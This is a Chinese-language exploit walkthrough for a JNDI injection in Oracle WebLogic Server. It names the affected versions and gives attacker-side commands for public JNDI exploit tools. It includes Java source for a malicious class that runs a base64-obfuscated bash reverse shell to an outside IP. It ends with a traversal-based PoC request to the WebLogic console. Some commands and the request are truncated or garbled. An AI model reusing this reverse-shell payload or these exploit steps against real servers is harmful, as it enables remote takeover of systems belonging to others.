影响版本 Weblogic Server 10.3.6.0.0
Weblogic Server 12.1.3.0.0
Weblogic Server 12.2.1.3.0
Weblogic Server 12.2.1.4.0
Weblogic Server 14.1.1.0.0
利用方式一:无回显利用-反弹shell 1、工具github地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases
vps上执行:
1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "反弹shell的命令" -A "vpsip"
vps监听端口:
poc:
反弹成功
2、也可以直接通过marshalsec-0.0.3-SNAPSHOT-all.jar这个工具进行复现:
vps上执行:
启动JNDI服务
1
java -cp marshalsec-0.0 .3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http:
启动HTTPServer:
1
python -m SimpleHTTPServer 8080
http目录下放置恶意class文件,evilclass.class源码如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import java.lang.Runtime;
import java.lang.Process;
public class evilclass {
public evilclass () {
try {
String commands = "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDUuMTg2LjE0Ni84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" ;
Process pc = Runtime.getRuntime().exec(commands);
pc.waitFor();
} catch (Exception e){
e.printStackTrace();
}
}
public static void main (String[] argv) {
evilclass e = new evilclass();
}
}
vps监听端口:
poc:
利用方式二:回显利用 工具github地址:https://github.com/feihong-cs/JNDIExploit/releases/
vps上执行:
1
java -jar JNDIExploit-v1.11.jar -i vpsip
poc:
1
2
3
4
5
6
7
8
9
GET /console/css/%252 E%252 E%252F consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true &JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22l dap:
Host: 192.168 .157.189:49163
User-Agent: Mozilla/5.0 (Windows NT 10.0 ; Win64; x64; rv:74.0 ) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9 ,image/webp,*